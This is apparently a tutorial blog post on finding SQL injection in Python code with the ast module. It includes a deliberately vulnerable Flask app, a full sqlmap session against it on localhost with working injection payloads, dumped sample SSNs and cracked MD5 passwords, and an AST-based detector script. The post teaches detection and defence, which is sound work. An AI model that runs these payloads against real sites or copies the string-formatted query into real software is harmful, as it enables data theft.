Detecting SQL injections in Python code using AST
Python has a built-in ast module that lets you inspect, parse and edit Python code. AST stands for abstract syntax tree, a data structure that makes it easy to analyze, inspect and edit programming language code.
When working with abstract trees, you don't have to worry about the syntax of a programming language. Abstract trees represent relations between objects, operators and language expressions.
This article shows a real-world example of how you can use this module to detect SQL injection vulnerabilities in Python code.
Introduction to SQL injections
SQL injection is a code injection technique that makes it possible for an attacker to insert or alter SQL query in the poorly designed application.
To demonstrate this attack, I wrote a simple web application using flask:
import sqlite3
import hashlib
from flask import Flask, request
app = Flask(__name__)
def connect():
conn = sqlite3.connect(':memory:', check_same_thread=False)
c = conn.cursor()
c.execute("CREATE TABLE users (username TEXT, password TEXT, rank TEXT)")
c.execute("INSERT INTO users VALUES ('admin', 'e1568c571e684e0fb1724da85d215dc0', 'admin')")
c.execute("INSERT INTO users VALUES ('bob', '2b903105b59299c12d6c1e2ac8016941', 'user')")
c.execute("INSERT INTO users VALUES ('alice', 'd8578edf8458ce06fbc5bb76a58c5ca4', 'moderator')")
c.execute("CREATE TABLE SSN(user_id INTEGER, number TEXT)")
c.execute("INSERT INTO SSN VALUES (1, '480-62-10043')")
c.execute("INSERT INTO SSN VALUES (2, '690-10-6233')")
c.execute("INSERT INTO SSN VALUES (3, '401-09-1516')")
conn.commit()
return conn
CONNECTION = connect()
@app.route("/login")
def login():
username = request.args.get('username', '')
password = request.args.get('password', '')
md5 = hashlib.new('md5', password.encode('utf-8'))
password = md5.hexdigest()
c = CONNECTION.cursor()
c.execute("SELECT * FROM users WHERE username = ? and password = ?", (username, password))
data = c.fetchone()
if data is None:
return 'Incorrect username and password.'
else:
return 'Welcome %s! Your rank is %s.' % (username, data[2])
@app.route("/users")
def list_users():
rank = request.args.get('rank', '')
if rank == 'admin':
return "Can't list admins!"
c = CONNECTION.cursor()
c.execute("SELECT username, rank FROM users WHERE rank = '{0}'".format(rank))
data = c.fetchall()
return str(data)
if __name__ == '__main__':
app.run(debug=True)
To run this application, execute the following commands:
$ pip install flask
$ python webapp.py
My web application has two endpoints: login and user listing. For simplicity, both endpoints work with GET parameters.
Here are some URLs that you can try while running this app locally:
http://localhost:5000/login?username=admin&password=l33t
http://localhost:5000/login?username=admin&password=wrong_pass
http://localhost:5000/users?rank=user
http://localhost:5000/users?rank=admin
The first endpoint logins a user and is safe from SQL injection attacks because it uses parameter binding (prepared statements). When preparing a query, SQLite engine encodes and escapes such variables if needed.
The second endpoint list all users and filters them by rank. Instead of parameter binding, it uses string formatting and has a very serious vulnerability. Since the rank variable is not escaped or preprocessed, we can inject arbitrary SQL code in the query.
By adding an OR statement, we can list all users and bypass listing restriction for admin category:
This is one of the easiest types of SQL injection that lets you dump any table in one query:
Even if a page doesn't display anything from a query result, it's still possible to retrieve data from a vulnerable website. One of the techniques that can retrieve data from such queries is time-based blind SQL Injection.
The scary thing is that you don't even need to know all the techniques. Sqlmap automates the process of detecting SQL injection and can automatically try the most common SQL injection techniques. It can also crack database passwords for you!
$ sqlmap -a -u 'http://127.0.0.1:5000/users?rank=user' --dbms SQLite
___
__H__
___ ___[)]_____ ___ ___ {1.3.4#pip}
|_ -| . [.] | .'| . |
|___|_ [(]_|_|_|__,| _|
|_|V... |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 20:43:45 /2019-04-28/
[20:43:45] [INFO] testing connection to the target URL
[20:43:45] [INFO] checking if the target is protected by some kind of WAF/IPS
[20:43:45] [INFO] testing if the target URL content is stable
[20:43:46] [INFO] target URL content is stable
[20:43:46] [INFO] testing if GET parameter 'rank' is dynamic
[20:43:46] [INFO] GET parameter 'rank' appears to be dynamic
[20:43:46] [INFO] heuristic (basic) test shows that GET parameter 'rank' might be injectable (possible DBMS: 'SQLite')
[20:43:47] [INFO] testing for SQL injection on GET parameter 'rank'
for the remaining tests, do you want to include all tests for 'SQLite' extending provided level (1) and risk (1) values? [Y/n] y
[20:43:55] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[20:43:55] [INFO] GET parameter 'rank' appears to be 'AND boolean-based blind - WHERE or HAVING clause' injectable
[20:43:55] [INFO] testing 'SQLite inline queries'
[20:43:55] [INFO] testing 'SQLite > 2.0 stacked queries (heavy query - comment)'
[20:43:55] [WARNING] time-based comparison requires larger statistical model, please wait..................... (done)
[20:43:56] [INFO] testing 'SQLite > 2.0 stacked queries (heavy query)'
[20:43:56] [INFO] testing 'SQLite > 2.0 AND time-based blind (heavy query)'
[20:44:03] [INFO] GET parameter 'rank' appears to be 'SQLite > 2.0 AND time-based blind (heavy query)' injectable
[20:44:03] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[20:44:03] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[20:44:03] [INFO] 'ORDER BY' technique appears to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[20:44:03] [INFO] target URL appears to have 2 columns in query
[20:44:03] [INFO] GET parameter 'rank' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable
GET parameter 'rank' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n
sqlmap identified the following injection point(s) with a total of 43 HTTP(s) requests:
---
Parameter: rank (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: rank=user' AND 4660=4660 AND 'Xjyl'='Xjyl
Type: time-based blind
Title: SQLite > 2.0 AND time-based blind (heavy query)
Payload: rank=user' AND 4392=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(500000000/2)))) AND 'sDKi'='sDKi
Type: UNION query
Title: Generic UNION query (NULL) - 2 columns
Payload: rank=user' UNION ALL SELECT NULL,'qbbjq'||'TiNyLomYpcxzyfynNnMsfBujDZyhYgTbfjLgSgje'||'qqvbq'-- FFGj
---
[20:44:09] [INFO] the back-end DBMS is SQLite
[20:44:09] [INFO] fetching banner
back-end DBMS: SQLite
banner: '3.20.1'
[20:44:09] [WARNING] on SQLite it is not possible to enumerate the current user
current user: None
[20:44:09] [WARNING] on SQLite it is not possible to get name of the current database
current database: None
[20:44:09] [WARNING] on SQLite it is not possible to enumerate the hostname
hostname: None
[20:44:09] [WARNING] on SQLite the current user has all privileges
current user is DBA: True
[20:44:09] [WARNING] on SQLite it is not possible to enumerate the users
[20:44:09] [WARNING] on SQLite it is not possible to enumerate the user password hashes
[20:44:09] [WARNING] on SQLite it is not possible to enumerate the user privileges
[20:44:09] [WARNING] on SQLite the concept of roles does not exist. sqlmap will enumerate privileges instead
[20:44:09] [WARNING] on SQLite it is not possible to enumerate the user privileges
[20:44:09] [INFO] sqlmap will dump entries of all tables from all databases now
[20:44:09] [INFO] fetching tables for database: 'SQLite_masterdb'
[20:44:09] [INFO] fetching columns for table 'SSN' in database 'SQLite_masterdb'
[20:44:10] [INFO] fetching entries for table 'SSN' in database 'SQLite_masterdb'
Database: SQLite_masterdb
Table: SSN
[3 entries]
+---------+--------------+
| user_id | number |
+---------+--------------+
| 1 | 480-62-10043 |
| 2 | 690-10-6233 |
| 3 | 401-09-1516 |
+---------+--------------+
[20:44:10] [INFO] table 'SQLite_masterdb.SSN' dumped to CSV file '.sqlmap/output/127.0.0.1/dump/SQLite_masterdb/SSN.csv'
[20:44:10] [INFO] fetching columns for table 'users' in database 'SQLite_masterdb'
[20:44:10] [INFO] fetching entries for table 'users' in database 'SQLite_masterdb'
[20:44:10] [INFO] recognized possible password hashes in column 'password'
do you want to store hashes to a temporary file for eventual further processing with other tools [y/N] y
[20:44:22] [INFO] writing hashes to a temporary file '/var/folders/t4/0m0twbd97ln8wwn479wyz70r0000gn/T/sqlmapkpR6bB58187/sqlmaphashes-Ksz1yj.txt'
do you want to crack them via a dictionary-based attack? [Y/n/q] y
[20:44:29] [INFO] using hash method 'md5_generic_passwd'
what dictionary do you want to use?
[1] default dictionary file 'sqlmap/txt/wordlist.zip' (press Enter)
[2] custom dictionary file
[3] file with list of dictionary files
> 1
[20:44:36] [INFO] using default dictionary
do you want to use common password suffixes? (slow!) [y/N] n
[20:44:40] [INFO] starting dictionary-based cracking (md5_generic_passwd)
[20:44:40] [INFO] starting 4 processes
[20:44:49] [INFO] cracked password 'l33t' for user 'admin'
[20:44:52] [INFO] cracked password 'qwerty' for user 'alice'
[20:44:53] [INFO] cracked password 'h4x0r' for user 'bob'
Database: SQLite_masterdb
Table: users
[3 entries]
+-----------+----------+-------------------------------------------+
| rank | username | password |
+-----------+----------+-------------------------------------------+
| admin | admin | e1568c571e684e0fb1724da85d215dc0 (l33t) |
| user | bob | 2b903105b59299c12d6c1e2ac8016941 (h4x0r) |
| moderator | alice | d8578edf8458ce06fbc5bb76a58c5ca4 (qwerty) |
+-----------+----------+-------------------------------------------+
[20:45:04] [INFO] table 'SQLite_masterdb.users' dumped to CSV file '.sqlmap/output/127.0.0.1/dump/SQLite_masterdb/users.csv'
[20:45:04] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 12 times
[20:45:04] [INFO] fetched data logged to text files under '.sqlmap/output/127.0.0.1'
[*] ending @ 20:45:04 /2019-04-28/
There are a lot of articles explaining SQL injection. If you want to dive deeper, I would recommend starting with OWASP.
Detecting SQL injections using abstract syntax trees
The most common mistake that leads to SQL injections in Python code is using string formatting in SQL statements. To find an SQL injection in Python code, we need to search for string formatting in the execute
or executemany
function call.
There are at least three ways to format a string in Python:
c.execute("SELECT username, rank FROM users WHERE rank = '{0}'".format(rank))
c.execute("SELECT username, rank FROM users WHERE rank = '%s'" % rank)
c.execute(f"SELECT username, rank FROM users WHERE rank = `{rank}`")
Additionally, I want to track simple variable assignments:
q = "SELECT username, rank FROM users qqqq WHERE rank = '%s'" % rank
c.execute(q)
To reduce the chance of false positives, we also need to check if the argument contains an SQL statement.
Here is how the AST SQL injection detector looks like:
import ast
import astor
import re
SQL_FUNCTIONS = {
'execute',
'executemany',
}
SQL_OPERATORS = re.compile('SELECT|UPDATE|INSERT|DELETE', re.IGNORECASE)
class ASTWalker(ast.NodeVisitor):
def __init__(self):
self.candidates = []
self.variables = {}
def visit_Call(self, node):
# Search for function calls with attributes, e.g. cursor.execute
if isinstance(node.func, ast.Attribute) and node.func.attr in SQL_FUNCTIONS:
self._check_function_call(node)
# Traverse child nodes
self.generic_visit(node)
def visit_Assign(self, node):
if not isinstance(node.targets[0], ast.Name):
return self.generic_visit(node)
variable, value = node.targets[0].id, node.value
# Some variable assignments can store SQL queries with string formatting.
# Save them for later.
if isinstance(value, (ast.Call, ast.BinOp, ast.Mod)):
self.variables[variable] = node.value
self.generic_visit(node)
def _check_function_call(self, node):
if not node.args:
return
first_argument = node.args[0]
query = self._check_function_argument(first_argument)
if query and re.search(SQL_OPERATORS, query):
self.candidates.append(node)
def _check_function_argument(self, argument):
query = None
if isinstance(argument, ast.Call) and argument.func.attr == 'format':
# Formatting using .format
query = argument.func.value.s
elif isinstance(argument, ast.BinOp) and isinstance(argument.op, ast.Mod):
# Old-style formatting, .e.g. '%s' % 'string'
query = argument.left.s
elif isinstance(argument, ast.JoinedStr) and len(argument.values) > 1:
# New style f-strings
query = argument.values[0].s
elif isinstance(argument, ast.Name) and argument.id in self.variables:
# If execute function takes a variable as an argument, try to track its real value.
query = self._check_function_argument(self.variables[argument.id])
return query
if __name__ == '__main__':
code = open('webapp.py', 'r').read()
tree = ast.parse(code)
ast_walker = ASTWalker()
ast_walker.visit(tree)
for candidate in ast_walker.candidates:
print(astor.to_source(candidate).strip())
The NodeVisitor
class is a base class for tree scanning. Every method that starts with a visit_
will be automatically called with a corresponding expression when traversing a tree.
For this task, we only need to handle two expressions - the Call
and Assign
. The former is triggered on a function call and the latter on variable assignment. Our class will find all execute
function calls no matter how the code is formatted or structured.
This script produces a lot of false positives but despite this works pretty well. It's very hard to automatically track if a variable is coming from the HTTP request and can be altered by a user. Because of that, every find must be checked by a human eye.
Testing the script on GitHub data
To test my script, I've scraped around 100 Python scripts using GitHub search and was able to find four repositories that have exploitable SQL injection vulnerabilities. To have such a good detection rate, you also need to come up with a clever search query. I won't post it for ethical reasons :).
There are a lot of things that can be improved in the script. For example, this query uses formatting but can't be exploited:
c.execute("SELECT * FROM users WHERE year_registered = {0} ".format(int(year)))
In general, this is a pretty good result for a script that was written in one hour.
The source code is available on Github. You can send me a PR if you will find ways to improve it.
Could you share the repositories? I want to use it to train the model. Thanks a lot. Good luck!